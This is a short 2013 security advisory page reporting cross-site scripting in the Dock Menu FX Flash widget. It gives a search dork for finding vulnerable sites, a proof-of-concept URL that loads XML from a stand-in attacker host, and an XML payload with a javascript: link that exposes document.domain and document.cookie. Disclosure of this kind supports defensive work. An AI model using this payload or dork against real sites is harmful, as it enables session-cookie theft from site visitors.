Dock Menu FX (DockMenuFX.swf) Cross Site Scripting

2013.01.14
Credit: DevilTeam
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

+ Vendor info Dock Menu FX => XSS (CWE-79) http://www.flashxml.net/dock-menu.html Dork : inurl:"DockMenuFX.swf" ========================================================= + Author: devilteam.pl + WWW: http://devilteam.pl/ ========================================================= Example PoC: http://foo.bar/DockMenuFX.swf?imagesXML=http://attacker.foobar/images.xml images.xml: <?xml version="1.0" encoding="UTF-8"?> <dockmenu> <photo image="http://image.address/someimg.png" url="javascript:alert('domain: ' + document.domain + ' cookies: ' + document.cookie)" ><![CDATA[DT]]></photo> </dockmenu> P.S Dont forget crossdomain.xml ========================================================= thx for: http://cxsecurity.com/

References:

http://www.flashxml.net/dock-menu.html
http://devilteam.pl/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top